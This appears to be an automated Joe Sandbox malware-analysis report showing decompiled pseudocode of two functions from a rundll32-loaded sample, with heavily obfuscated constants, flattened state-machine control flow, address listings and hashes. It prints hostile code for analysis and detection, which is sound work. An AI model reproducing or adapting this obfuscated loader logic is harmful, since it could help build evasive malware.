				_v20 = _v20 ^ 0x5c57be60;
				_v20 = _v20 ^ 0x5cd84720;
				_v144 = 0x80ab55;
				_t403 = 0x46;
				_v144 = _v144 / _t403;
				_v144 = _v144 + 0xffffcaef;
				_v144 = _v144 + 0xffff67c3;
				_v144 = _v144 ^ 0x00052ea0;
				_v16 = 0xeb356a;
				_t199 =  &_v16; // 0xeb356a
				_t404 = 0x65;
				_v16 =  *_t199 / _t404;
				_v16 = _v16 ^ 0x000ce393;
				_v88 = 0xe75d2;
				_v88 = _v88 + 0xe1a2;
				_v88 = _v88 ^ 0xbfa107b7;
				_v88 = _v88 ^ 0xbfa92cf6;
				_v40 = 0xb57020;
				_t405 = 0x18;
				_v40 = _v40 / _t405;
				_v40 = _v40 ^ 0x000d9612;
				_v80 = 0xaa39d6;
				_t406 = 0x4c;
				_v80 = _v80 / _t406;
				_t407 = 0x4f;
				_v80 = _v80 / _t407;
				_v80 = _v80 ^ 0x000dd886;
				_v84 = 0x7565b2;
				_v84 = _v84 ^ 0x85e60cd2;
				_v84 = _v84 | 0xe2f126fa;
				_v84 = _v84 ^ 0xe7fbef1f;
				_v92 = 0x20921c;
				_v92 = _v92 << 0xf;
				_t408 = 0x3d;
				_v92 = _v92 / _t408;
				_v92 = _v92 ^ 0x0137fd8d;
				_v104 = 0x7d1988;
				_v104 = _v104 | 0x48f8c783;
				_v104 = _v104 * 0x2a;
				_v104 = _v104 >> 4;
				_v104 = _v104 ^ 0x0f9ace16;
				_v32 = 0xc6b5a4;
				_v32 = _v32 ^ 0x611852a0;
				_v32 = _v32 ^ 0x61d9018e;
				_v24 = 0x4e0063;
				_v24 = _v24 * 0x56;
				_v24 = _v24 ^ 0x1a371aa3;
				_v60 = 0xb39a6a;
				_v60 = _v60 + 0x379a;
				_v60 = _v60 << 0xb;
				_v60 = _v60 ^ 0x9e9cdd6f;
				_v68 = 0xe7ba26;
				_v68 = _v68 + 0xffffbb05;
				_v68 = _v68 ^ 0xbd703087;
				_v68 = _v68 ^ 0xbd98ca1c;
				_v76 = 0x8102f3;
				_v76 = _v76 << 6;
				_v76 = _v76 * 0x7c;
				_v76 = _v76 ^ 0x9f574684;
				while(1) {
					L1:
					_t444 =  *0x10025c90;
					_t373 = 0x882fd94;
					do {
						if(_t452 == 0x68b0bf3) {
							_push(_t408);
							_push(_t408);
							_t409 = 0x28;
							_t377 = E00822912(_t409);
							 *0x10025c90 = _t377;
							_t377[3] = 0x4000;
							_t325 =  &(( *0x10025c90)[3]); // 0x1a8e9
							_t381 = E00822912( *_t325);
							_t444 =  *0x10025c90;
							_t452 = 0xf7a4d1a;
							_t408 = _t381;
							_t326 =  &(_t444[3]); // 0x1a8e9
							_t383 =  *_t326 + _t408;
							__eflags = _t383;
							_t444[2] = _t408;
							_t444[1] = _t408;
							 *_t444 = _t408;
							_t444[5] = _t383;
							L12:
							_t373 = 0x882fd94;
							goto L13;
						}
						if(_t452 == _t373) {
							_t384 =  *0x10025c90;
							_t312 =  &(_t384[2]); // 0x145d8908
							_t313 =  &(_t384[3]); // 0x1a8e9
							_t408 = _v20;
							_t385 = E0081BB95(_t408, _v144, _v36,  *_t313,  *_t312, _v12, _v16, _v88);
							_t456 =  &(_t456[6]);
							__eflags = _t385 - _v72;
							if(__eflags != 0) {
								_t452 = 0xcb14d1c;
							} else {
								_t452 = 0xd2040d1;
								_t396 = 1;
							}
							goto L1;
						}
						if(_t452 == 0xcb14d1c) {
							_t334 =  &(_t444[2]); // 0x145d8908
							E00815CDE(_v84, _v92, _v104, _v32,  *_t334);
							E00815CDE(_v24, _v60, _v68, _v76,  *0x10025c90);
							L17:
							return _t396;
						}
						if(_t452 == 0xd2040d1) {
							E00816427(_v40, _v100, _v12, _v80);
							goto L17;
						}
						_t463 = _t452 - 0xf7a4d1a;
						if(_t452 != 0xf7a4d1a) {
							goto L13;
						}
						_push(_v148);
						_push(_v28);
						_push(0x10001324);
						E008202DA(0, _v108, _v140, E00819F66(_v124, _v56, _t463),  &_v12, _v64, _v96);
						_t408 = _v152;
						_t452 =  ==  ? 0x882fd94 : 0xcb14d1c;
						E0081A203(_t408, _v116, _v44, _t390);
						_t444 =  *0x10025c90;
						_t456 =  &(_t456[0xa]);
						goto L12;
						L13:
					} while (_t452 != 0xd072e76);
					goto L17;
				}
			}































































                                                                                                                      0x008268dd
                                                                                                                      0x008268e3
                                                                                                                      0x008268f4
                                                                                                                      0x008268f6
                                                                                                                      0x008268fb
                                                                                                                      0x00826902
                                                                                                                      0x00826918
                                                                                                                      0x0082691d
                                                                                                                      0x00826923
                                                                                                                      0x0082692b
                                                                                                                      0x00826933
                                                                                                                      0x0082693b
                                                                                                                      0x00826943
                                                                                                                      0x0082694b
                                                                                                                      0x00826950
                                                                                                                      0x00826958
                                                                                                                      0x00826963
                                                                                                                      0x0082696b
                                                                                                                      0x00826976
                                                                                                                      0x00826983
                                                                                                                      0x00826986
                                                                                                                      0x0082698a
                                                                                                                      0x00826992
                                                                                                                      0x0082699a
                                                                                                                      0x008269a2
                                                                                                                      0x008269a7
                                                                                                                      0x008269af
                                                                                                                      0x008269b7
                                                                                                                      0x008269bf
                                                                                                                      0x008269c7
                                                                                                                      0x008269cf
                                                                                                                      0x008269d7
                                                                                                                      0x008269df
                                                                                                                      0x008269e7
                                                                                                                      0x008269ec
                                                                                                                      0x008269f4
                                                                                                                      0x008269f9
                                                                                                                      0x00826a01
                                                                                                                      0x00826a0e
                                                                                                                      0x00826a12
                                                                                                                      0x00826a1a
                                                                                                                      0x00826a22
                                                                                                                      0x00826a2a
                                                                                                                      0x00826a32
                                                                                                                      0x00826a3a
                                                                                                                      0x00826a42
                                                                                                                      0x00826a52
                                                                                                                      0x00826a56
                                                                                                                      0x00826a5f
                                                                                                                      0x00826a62
                                                                                                                      0x00826a66
                                                                                                                      0x00826a6e
                                                                                                                      0x00826a76
                                                                                                                      0x00826a7e
                                                                                                                      0x00826a86
                                                                                                                      0x00826a8e
                                                                                                                      0x00826a96
                                                                                                                      0x00826a9b
                                                                                                                      0x00826aa0
                                                                                                                      0x00826aa8
                                                                                                                      0x00826ab0
                                                                                                                      0x00826ab5
                                                                                                                      0x00826abd
                                                                                                                      0x00826aca
                                                                                                                      0x00826ad2
                                                                                                                      0x00826add
                                                                                                                      0x00826aeb
                                                                                                                      0x00826af0
                                                                                                                      0x00826af6
                                                                                                                      0x00826afe
                                                                                                                      0x00826b03
                                                                                                                      0x00826b0b
                                                                                                                      0x00826b13
                                                                                                                      0x00826b1b
                                                                                                                      0x00826b23
                                                                                                                      0x00826b28
                                                                                                                      0x00826b30
                                                                                                                      0x00826b38
                                                                                                                      0x00826b40
                                                                                                                      0x00826b48
                                                                                                                      0x00826b50
                                                                                                                      0x00826b58
                                                                                                                      0x00826b65
                                                                                                                      0x00826b68
                                                                                                                      0x00826b6c
                                                                                                                      0x00826b74
                                                                                                                      0x00826b7c
                                                                                                                      0x00826b84
                                                                                                                      0x00826b91
                                                                                                                      0x00826b95
                                                                                                                      0x00826b9d
                                                                                                                      0x00826ba5
                                                                                                                      0x00826bad
                                                                                                                      0x00826bb2
                                                                                                                      0x00826bba
                                                                                                                      0x00826bc2
                                                                                                                      0x00826bd8
                                                                                                                      0x00826bdf
                                                                                                                      0x00826bea
                                                                                                                      0x00826bf5
                                                                                                                      0x00826c00
                                                                                                                      0x00826c0b
                                                                                                                      0x00826c17
                                                                                                                      0x00826c1c
                                                                                                                      0x00826c22
                                                                                                                      0x00826c2a
                                                                                                                      0x00826c32
                                                                                                                      0x00826c3a
                                                                                                                      0x00826c45
                                                                                                                      0x00826c4c
                                                                                                                      0x00826c51
                                                                                                                      0x00826c5a
                                                                                                                      0x00826c65
                                                                                                                      0x00826c6d
                                                                                                                      0x00826c75
                                                                                                                      0x00826c7d
                                                                                                                      0x00826c85
                                                                                                                      0x00826c97
                                                                                                                      0x00826c9a
                                                                                                                      0x00826ca1
                                                                                                                      0x00826cac
                                                                                                                      0x00826cc1
                                                                                                                      0x00826cc6
                                                                                                                      0x00826cd0
                                                                                                                      0x00826cd5
                                                                                                                      0x00826cdb
                                                                                                                      0x00826ce3
                                                                                                                      0x00826ceb
                                                                                                                      0x00826cf3
                                                                                                                      0x00826cfb
                                                                                                                      0x00826d03
                                                                                                                      0x00826d0b
                                                                                                                      0x00826d14
                                                                                                                      0x00826d17
                                                                                                                      0x00826d1b
                                                                                                                      0x00826d23
                                                                                                                      0x00826d2b
                                                                                                                      0x00826d38
                                                                                                                      0x00826d3c
                                                                                                                      0x00826d41
                                                                                                                      0x00826d49
                                                                                                                      0x00826d54
                                                                                                                      0x00826d5f
                                                                                                                      0x00826d6a
                                                                                                                      0x00826d7d
                                                                                                                      0x00826d84
                                                                                                                      0x00826d8f
                                                                                                                      0x00826d97
                                                                                                                      0x00826d9f
                                                                                                                      0x00826da4
                                                                                                                      0x00826dac
                                                                                                                      0x00826db4
                                                                                                                      0x00826dbc
                                                                                                                      0x00826dc4
                                                                                                                      0x00826dcc
                                                                                                                      0x00826dd4
                                                                                                                      0x00826dde
                                                                                                                      0x00826de2
                                                                                                                      0x00826dea
                                                                                                                      0x00826dea
                                                                                                                      0x00826dea
                                                                                                                      0x00826df0
                                                                                                                      0x00826df5
                                                                                                                      0x00826dfb
                                                                                                                      0x00826efa
                                                                                                                      0x00826efb
                                                                                                                      0x00826efe
                                                                                                                      0x00826eff
                                                                                                                      0x00826f04
                                                                                                                      0x00826f09
                                                                                                                      0x00826f25
                                                                                                                      0x00826f28
                                                                                                                      0x00826f2d
                                                                                                                      0x00826f33
                                                                                                                      0x00826f3a
                                                                                                                      0x00826f3c
                                                                                                                      0x00826f3f
                                                                                                                      0x00826f3f
                                                                                                                      0x00826f41
                                                                                                                      0x00826f44
                                                                                                                      0x00826f47
                                                                                                                      0x00826f49
                                                                                                                      0x00826f4c
                                                                                                                      0x00826f4c
                                                                                                                      0x00000000
                                                                                                                      0x00826f4c
                                                                                                                      0x00826e03
                                                                                                                      0x00826ea8
                                                                                                                      0x00826eb4
                                                                                                                      0x00826eb7
                                                                                                                      0x00826ec5
                                                                                                                      0x00826ecc
                                                                                                                      0x00826ed1
                                                                                                                      0x00826ed4
                                                                                                                      0x00826ed8
                                                                                                                      0x00826ee7
                                                                                                                      0x00826eda
                                                                                                                      0x00826edc
                                                                                                                      0x00826ee1
                                                                                                                      0x00826ee1
                                                                                                                      0x00000000
                                                                                                                      0x00826ed8
                                                                                                                      0x00826e0b
                                                                                                                      0x00826f7e
                                                                                                                      0x00826f94
                                                                                                                      0x00826fb5
                                                                                                                      0x00826fc0
                                                                                                                      0x00826fc9
                                                                                                                      0x00826fc9
                                                                                                                      0x00826e17
                                                                                                                      0x00826f75
                                                                                                                      0x00000000
                                                                                                                      0x00826f7b
                                                                                                                      0x00826e1d
                                                                                                                      0x00826e23
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00826e29
                                                                                                                      0x00826e2d
                                                                                                                      0x00826e3c
                                                                                                                      0x00826e63
                                                                                                                      0x00826e83
                                                                                                                      0x00826e87
                                                                                                                      0x00826e8a
                                                                                                                      0x00826e8f
                                                                                                                      0x00826e95
                                                                                                                      0x00000000
                                                                                                                      0x00826f51
                                                                                                                      0x00826f51
                                                                                                                      0x00000000
                                                                                                                      0x00826f5d

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: V$!<z$-.$4R$7J5$FfF$Kg$c$j5$wZ9H
                                                                                                                      • API String ID: 0-218644068
                                                                                                                      • Opcode ID: 41da371709b23ce9d761cf5aa6c0d0b31592452060af55ea57f2db15f071c6e6
                                                                                                                      • Instruction ID: 695def47ff5b3f499ed02d6d31af7355d09787c3f7c069ab42897d91753899e1
                                                                                                                      • Opcode Fuzzy Hash: 41da371709b23ce9d761cf5aa6c0d0b31592452060af55ea57f2db15f071c6e6
                                                                                                                      • Instruction Fuzzy Hash: BF0221715083809FD3A8CF25D58A64BFBE2FBC4718F50891DF2998A261DBB58949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00815483 Relevance: 11.7, Strings: 9, Instructions: 413COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E00815483(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v256;
				char _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				void* _t385;
				void* _t420;
				void* _t428;
				void* _t430;
				intOrPtr _t439;
				intOrPtr _t447;
				intOrPtr _t448;
				signed int _t451;
				void* _t458;
				intOrPtr _t460;
				intOrPtr _t495;
				signed int _t502;
				signed int _t503;
				signed int _t504;
				signed int _t505;
				signed int _t506;
				signed int _t507;
				signed int _t508;
				signed int _t509;
				signed int _t510;
				signed int _t511;
				signed int _t512;
				signed int _t513;
				void* _t514;
				signed int* _t516;
				void* _t520;

				_push(_a20);
				_t514 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0081C325(_t385);
				_v320 = 0x5bfd8;
				_t516 =  &(( &_v424)[7]);
				_v320 = _v320 ^ 0xae83e4b4;
				_v320 = _v320 + 0xffffbfdd;
				_t448 = 0;
				_v320 = _v320 ^ 0xae801261;
				_t451 = 0x4bae340;
				_v384 = 0x359b5d;
				_v384 = _v384 >> 9;
				_v384 = _v384 + 0x5a0;
				_v384 = _v384 ^ 0x40b7bf66;
				_v384 = _v384 ^ 0x40befa95;
				_v316 = 0x2933e6;
				_t502 = 0x13;
				_t504 = 0xf;
				_v316 = _v316 * 0x63;
				_v316 = _v316 ^ 0x0fe001ce;
				_v300 = 0x5708b8;
				_v300 = _v300 | 0xa16343bc;
				_v300 = _v300 ^ 0xa1786c90;
				_v308 = 0x5d4fad;
				_v308 = _v308 + 0xffffde8c;
				_v308 = _v308 ^ 0x0055ed4e;
				_v312 = 0x97068f;
				_v312 = _v312 >> 1;
				_v312 = _v312 ^ 0x0045ea4b;
				_v284 = 0xe9a634;
				_v284 = _v284 ^ 0x5bc7ef92;
				_v284 = _v284 ^ 0x5b2ed6c9;
				_v344 = 0xd52660;
				_v344 = _v344 + 0x6034;
				_v344 = _v344 >> 7;
				_v344 = _v344 ^ 0x000a9937;
				_v412 = 0x492529;
				_t55 =  &_v412; // 0x492529
				_v412 =  *_t55 * 0xa;
				_t57 =  &_v412; // 0x492529
				_v412 =  *_t57 / _t502;
				_t63 =  &_v412; // 0x492529
				_v412 =  *_t63 / _t504;
				_v412 = _v412 ^ 0x000522b4;
				_v360 = 0xff1035;
				_v360 = _v360 >> 5;
				_v360 = _v360 << 5;
				_v360 = _v360 ^ 0x00f6febc;
				_v352 = 0x24acbd;
				_v352 = _v352 >> 0xc;
				_v352 = _v352 * 0x36;
				_v352 = _v352 ^ 0x000a49b8;
				_v404 = 0x5e8a96;
				_v404 = _v404 >> 1;
				_v404 = _v404 / _t502;
				_v404 = _v404 + 0xffff7de4;
				_v404 = _v404 ^ 0x00019221;
				_v372 = 0xa45532;
				_v372 = _v372 + 0xffff1c48;
				_v372 = _v372 + 0xffffe0f0;
				_t505 = 0x6c;
				_v372 = _v372 * 0x6c;
				_v372 = _v372 ^ 0x44ea3f2c;
				_v380 = 0xf56085;
				_v380 = _v380 / _t505;
				_t506 = 0xd;
				_v380 = _v380 / _t506;
				_v380 = _v380 << 0xe;
				_v380 = _v380 ^ 0x0b2ea957;
				_v328 = 0x46776f;
				_v328 = _v328 + 0x15ec;
				_t507 = 0x1c;
				_v328 = _v328 * 0x5e;
				_v328 = _v328 ^ 0x19ebcb1f;
				_v388 = 0xfbc23f;
				_v388 = _v388 | 0xf6357e00;
				_v388 = _v388 + 0x8932;
				_v388 = _v388 ^ 0xf4ea365f;
				_v388 = _v388 ^ 0x03ea209f;
				_v336 = 0x730db6;
				_v336 = _v336 * 0x5b;
				_v336 = _v336 | 0x6492896b;
				_v336 = _v336 ^ 0x6cf77a3a;
				_v340 = 0x166b3b;
				_v340 = _v340 | 0x8c211161;
				_v340 = _v340 ^ 0x8c378fd9;
				_v396 = 0x9d5a93;
				_v396 = _v396 / _t507;
				_v396 = _v396 ^ 0xba861a50;
				_v396 = _v396 + 0xffff5b99;
				_v396 = _v396 ^ 0xba80e2b9;
				_v420 = 0x409c68;
				_t508 = 0x31;
				_v420 = _v420 / _t508;
				_v420 = _v420 >> 8;
				_t509 = 5;
				_v420 = _v420 * 0x16;
				_v420 = _v420 ^ 0x00013fee;
				_v296 = 0xc785e1;
				_v296 = _v296 ^ 0x791e03db;
				_v296 = _v296 ^ 0x79d79a97;
				_v364 = 0xad0976;
				_v364 = _v364 | 0x8850e8a8;
				_v364 = _v364 << 1;
				_v364 = _v364 ^ 0x11fb25d1;
				_v368 = 0x704a10;
				_v368 = _v368 + 0xffff0d6b;
				_v368 = _v368 << 2;
				_v368 = _v368 ^ 0x01b3e76e;
				_v288 = 0x54d2f6;
				_v288 = _v288 / _t509;
				_v288 = _v288 ^ 0x001edf05;
				_v392 = 0x949bbb;
				_v392 = _v392 + 0xbb88;
				_v392 = _v392 | 0xb3cb4dcc;
				_v392 = _v392 * 0x45;
				_v392 = _v392 ^ 0x7b348758;
				_v416 = 0x643691;
				_v416 = _v416 >> 9;
				_v416 = _v416 + 0xffff74a1;
				_t510 = 0x4e;
				_v416 = _v416 / _t510;
				_v416 = _v416 ^ 0x03464fba;
				_v356 = 0xeb775b;
				_v356 = _v356 + 0xdb8c;
				_v356 = _v356 >> 0x10;
				_v356 = _v356 ^ 0x0001ede4;
				_v304 = 0xc1e7b5;
				_v304 = _v304 + 0xf3ef;
				_v304 = _v304 ^ 0x00c2397a;
				_v376 = 0xa68bc9;
				_t511 = 0x43;
				_v376 = _v376 / _t511;
				_v376 = _v376 >> 8;
				_v376 = _v376 ^ 0x3383f04e;
				_v376 = _v376 ^ 0x3381e4d6;
				_v408 = 0x4d9cfa;
				_t512 = 0x46;
				_t503 = _v340;
				_v408 = _v408 * 0x6f;
				_v408 = _v408 + 0x3c4a;
				_v408 = _v408 << 2;
				_v408 = _v408 ^ 0x869e5b7f;
				_v324 = 0x71360b;
				_v324 = _v324 * 0xc;
				_v324 = _v324 ^ 0x901d1633;
				_v324 = _v324 ^ 0x9559eaf9;
				_v292 = 0x9a124c;
				_v292 = _v292 + 0x530b;
				_v292 = _v292 ^ 0x0097d0f0;
				_v424 = 0x6705b6;
				_v424 = _v424 ^ 0xd04d23dd;
				_v424 = _v424 << 4;
				_v424 = _v424 >> 0xa;
				_v424 = _v424 ^ 0x000c33e5;
				_v348 = 0x1e9503;
				_v348 = _v348 >> 3;
				_v348 = _v348 ^ 0x290fe667;
				_v348 = _v348 ^ 0x2908b2d4;
				_v400 = 0xb348f5;
				_v400 = _v400 ^ 0x711fc93f;
				_v400 = _v400 << 8;
				_v400 = _v400 * 0x58;
				_v400 = _v400 ^ 0x4c97e764;
				_v332 = 0xe64092;
				_t513 = _v340;
				_v332 = _v332 / _t512;
				_v332 = _v332 + 0x1e96;
				_v332 = _v332 ^ 0x00036ca6;
				while(1) {
					L1:
					_t420 = 0xee6d0ab;
					do {
						while(1) {
							L2:
							_t520 = _t451 - 0x77439d8;
							if(_t520 > 0) {
								break;
							}
							if(_t520 == 0) {
								E00815CDE(_v420, _v296, _v364, _v368, _v264);
								_t516 =  &(_t516[3]);
								_t451 = 0x2f9aadd;
								while(1) {
									L1:
									_t420 = 0xee6d0ab;
									goto L2;
								}
							} else {
								if(_t451 == 0x195d899) {
									_t460 =  *0x10025214;
									_t343 = _t460 + 0x3c; // 0x10743e39
									_t439 =  *((intOrPtr*)( *_t343 + 0x58));
									 *((intOrPtr*)(_t460 + 0x38)) =  *((intOrPtr*)(_t460 + 0x38)) + 1;
									_t347 = _t460 + 0x38; // 0xc0330c71
									_t495 =  *_t347;
									 *((intOrPtr*)(_t460 + 0x3c)) = _t439;
									if(_t439 == 0) {
										_t349 = _t460 + 4; // 0x1004b8ac
										 *((intOrPtr*)(_t460 + 0x3c)) =  *_t349;
									}
									_t351 =  *0x10025214 + 0x44; // 0x56575757
									if(_t495 >=  *_t351) {
										 *( *0x10025214 + 0x38) =  *( *0x10025214 + 0x38) & 0x00000000;
									} else {
										_t451 = 0x4bae340;
										while(1) {
											L1:
											_t420 = 0xee6d0ab;
											goto L2;
										}
									}
								} else {
									if(_t451 == 0x2f9aadd) {
										E00815CDE(_v288, _v392, _v416, _v356, _v280);
										E00815CDE(_v304, _v376, _v408, _v324, _t513);
										E00815CDE(_v292, _v424, _v348, _v400, _v272);
										_t516 =  &(_t516[9]);
										_t451 = _t503;
										L33:
										_t420 = 0xee6d0ab;
										goto L34;
									} else {
										if(_t451 == 0x4bae340) {
											_t513 = 0;
											E00830710(0x100,  &_v256, _v320, _v384, _v316, _v300);
											_v272 = _v272 & 0;
											_t516 =  &(_t516[4]);
											_v268 = _v268 & 0;
											_t451 = 0xce40172;
											_v280 = _v280 & 0;
											_v276 = _v276 & 0;
											while(1) {
												L1:
												_t420 = 0xee6d0ab;
												goto L2;
											}
										} else {
											if(_t451 != 0x55bcf65) {
												goto L34;
											} else {
												if(_v276 >= _v332) {
													_t447 = E00825C64( &_v280,  &_v272);
												} else {
													_t447 = E00821B53( &_v280);
												}
												_t513 = _t447;
												_t420 = 0xee6d0ab;
												_t451 =  !=  ? 0xee6d0ab : 0x2f9aadd;
												continue;
											}
										}
									}
								}
							}
							L37:
							return _t448;
						}
						if(_t451 == 0xa3ea571) {
							_t374 =  *0x10025214 + 0x3c; // 0x10743e39
							_t375 =  *0x10025214 + 0x3c; // 0x10743e39
							_t428 = E00826FCA(( *_t374)[0x28] & 0x0000ffff,  &_v256,  *( *_t374) & 0x0000ffff, _v372, _v380, _v328, _t513,  &_v272,  &_v264, _v388,  *_t375 + 0x20, _v336);
							_t516 =  &(_t516[0xa]);
							if(_t428 == 0) {
								_t503 = 0x195d899;
								_t451 = 0x2f9aadd;
								goto L33;
							} else {
								_t451 = 0xcddb738;
								goto L1;
							}
						} else {
							if(_t451 == 0xcddb738) {
								if(E0081B10F( &_v264, _v340, _t514, _v396) == 0) {
									_t503 = 0x195d899;
								} else {
									_t503 = 0x1fe0da0;
									_t448 = 1;
								}
								_t451 = 0x77439d8;
								while(1) {
									L1:
									_t420 = 0xee6d0ab;
									goto L2;
								}
							} else {
								if(_t451 == 0xce40172) {
									_t430 = E0081139B(_a20,  &_v280, _v308, _v312, _v284, _v344, _a8);
									_t516 =  &(_t516[5]);
									if(_t430 != 0) {
										_t451 = 0x55bcf65;
										while(1) {
											L1:
											_t420 = 0xee6d0ab;
											goto L2;
										}
									}
								} else {
									if(_t451 != _t420) {
										goto L34;
									} else {
										_push(E0081E371(1, 0x40));
										_push(_v404);
										_push( &_v256);
										_t458 = 0xb;
										E00814E07(_t458, _v352);
										_t516 =  &(_t516[5]);
										_t451 = 0xa3ea571;
										while(1) {
											L1:
											_t420 = 0xee6d0ab;
											goto L2;
										}
									}
								}
							}
						}
						goto L37;
						L34:
					} while (_t451 != 0x1fe0da0);
					goto L37;
				}
			}







































































                                                                                                                      0x0081548d
                                                                                                                      0x00815494
                                                                                                                      0x00815496
                                                                                                                      0x0081549d
                                                                                                                      0x008154a4
                                                                                                                      0x008154ab
                                                                                                                      0x008154b2
                                                                                                                      0x008154b3
                                                                                                                      0x008154b4
                                                                                                                      0x008154b9
                                                                                                                      0x008154c4
                                                                                                                      0x008154c7
                                                                                                                      0x008154d1
                                                                                                                      0x008154d9
                                                                                                                      0x008154db
                                                                                                                      0x008154e3
                                                                                                                      0x008154e8
                                                                                                                      0x008154f0
                                                                                                                      0x008154f5
                                                                                                                      0x008154fd
                                                                                                                      0x00815505
                                                                                                                      0x0081550d
                                                                                                                      0x0081551c
                                                                                                                      0x0081551f
                                                                                                                      0x00815520
                                                                                                                      0x00815524
                                                                                                                      0x0081552c
                                                                                                                      0x00815537
                                                                                                                      0x00815542
                                                                                                                      0x0081554d
                                                                                                                      0x00815558
                                                                                                                      0x00815563
                                                                                                                      0x0081556e
                                                                                                                      0x00815579
                                                                                                                      0x00815580
                                                                                                                      0x0081558b
                                                                                                                      0x00815596
                                                                                                                      0x008155a1
                                                                                                                      0x008155ac
                                                                                                                      0x008155b4
                                                                                                                      0x008155bc
                                                                                                                      0x008155c1
                                                                                                                      0x008155c9
                                                                                                                      0x008155d1
                                                                                                                      0x008155d6
                                                                                                                      0x008155da
                                                                                                                      0x008155e2
                                                                                                                      0x008155e6
                                                                                                                      0x008155ee
                                                                                                                      0x008155f2
                                                                                                                      0x008155fa
                                                                                                                      0x00815602
                                                                                                                      0x00815607
                                                                                                                      0x0081560c
                                                                                                                      0x00815614
                                                                                                                      0x0081561c
                                                                                                                      0x00815626
                                                                                                                      0x0081562a
                                                                                                                      0x00815632
                                                                                                                      0x0081563a
                                                                                                                      0x00815644
                                                                                                                      0x00815648
                                                                                                                      0x00815650
                                                                                                                      0x00815658
                                                                                                                      0x00815660
                                                                                                                      0x00815668
                                                                                                                      0x00815679
                                                                                                                      0x0081567c
                                                                                                                      0x00815680
                                                                                                                      0x00815688
                                                                                                                      0x00815698
                                                                                                                      0x008156a0
                                                                                                                      0x008156a5
                                                                                                                      0x008156ab
                                                                                                                      0x008156b0
                                                                                                                      0x008156b8
                                                                                                                      0x008156c0
                                                                                                                      0x008156cd
                                                                                                                      0x008156d0
                                                                                                                      0x008156d4
                                                                                                                      0x008156dc
                                                                                                                      0x008156e4
                                                                                                                      0x008156ec
                                                                                                                      0x008156f4
                                                                                                                      0x008156fc
                                                                                                                      0x00815704
                                                                                                                      0x00815711
                                                                                                                      0x00815715
                                                                                                                      0x0081571d
                                                                                                                      0x00815725
                                                                                                                      0x0081572d
                                                                                                                      0x00815735
                                                                                                                      0x0081573d
                                                                                                                      0x0081574d
                                                                                                                      0x00815751
                                                                                                                      0x00815759
                                                                                                                      0x00815761
                                                                                                                      0x00815769
                                                                                                                      0x00815775
                                                                                                                      0x0081577a
                                                                                                                      0x00815780
                                                                                                                      0x0081578a
                                                                                                                      0x0081578b
                                                                                                                      0x0081578f
                                                                                                                      0x00815797
                                                                                                                      0x008157a2
                                                                                                                      0x008157ad
                                                                                                                      0x008157b8
                                                                                                                      0x008157c0
                                                                                                                      0x008157c8
                                                                                                                      0x008157cc
                                                                                                                      0x008157d4
                                                                                                                      0x008157dc
                                                                                                                      0x008157e4
                                                                                                                      0x008157e9
                                                                                                                      0x008157f1
                                                                                                                      0x00815805
                                                                                                                      0x0081580c
                                                                                                                      0x00815817
                                                                                                                      0x0081581f
                                                                                                                      0x00815827
                                                                                                                      0x00815834
                                                                                                                      0x00815838
                                                                                                                      0x00815842
                                                                                                                      0x0081584a
                                                                                                                      0x0081584f
                                                                                                                      0x0081585d
                                                                                                                      0x00815862
                                                                                                                      0x00815868
                                                                                                                      0x00815870
                                                                                                                      0x00815878
                                                                                                                      0x00815880
                                                                                                                      0x00815885
                                                                                                                      0x0081588d
                                                                                                                      0x00815898
                                                                                                                      0x008158a3
                                                                                                                      0x008158ae
                                                                                                                      0x008158ba
                                                                                                                      0x008158bf
                                                                                                                      0x008158c5
                                                                                                                      0x008158ca
                                                                                                                      0x008158d2
                                                                                                                      0x008158da
                                                                                                                      0x008158e7
                                                                                                                      0x008158e8
                                                                                                                      0x008158ec
                                                                                                                      0x008158f0
                                                                                                                      0x008158f8
                                                                                                                      0x008158fd
                                                                                                                      0x00815905
                                                                                                                      0x00815912
                                                                                                                      0x00815916
                                                                                                                      0x0081591e
                                                                                                                      0x00815926
                                                                                                                      0x00815931
                                                                                                                      0x0081593c
                                                                                                                      0x00815947
                                                                                                                      0x0081594f
                                                                                                                      0x00815957
                                                                                                                      0x0081595c
                                                                                                                      0x00815961
                                                                                                                      0x00815969
                                                                                                                      0x00815971
                                                                                                                      0x00815976
                                                                                                                      0x0081597e
                                                                                                                      0x00815986
                                                                                                                      0x0081598e
                                                                                                                      0x00815996
                                                                                                                      0x008159a0
                                                                                                                      0x008159a4
                                                                                                                      0x008159ac
                                                                                                                      0x008159ba
                                                                                                                      0x008159be
                                                                                                                      0x008159c2
                                                                                                                      0x008159ca
                                                                                                                      0x008159d2
                                                                                                                      0x008159d2
                                                                                                                      0x008159d2
                                                                                                                      0x008159d7
                                                                                                                      0x008159d7
                                                                                                                      0x008159d7
                                                                                                                      0x008159d7
                                                                                                                      0x008159dd
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x008159e3
                                                                                                                      0x00815b5c
                                                                                                                      0x00815b61
                                                                                                                      0x00815b64
                                                                                                                      0x008159d2
